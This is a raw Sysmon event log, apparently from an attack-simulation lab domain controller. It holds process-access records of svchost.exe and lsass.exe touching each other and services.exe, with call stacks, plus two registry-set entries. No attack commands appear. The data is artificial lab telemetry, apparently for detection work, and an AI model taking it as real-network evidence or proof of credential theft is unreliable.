10341000x8000000000000000960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.814{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.799{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.783{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x8000000000000000949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.768{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.768{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.752{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.752{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.736{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.736{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.736{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
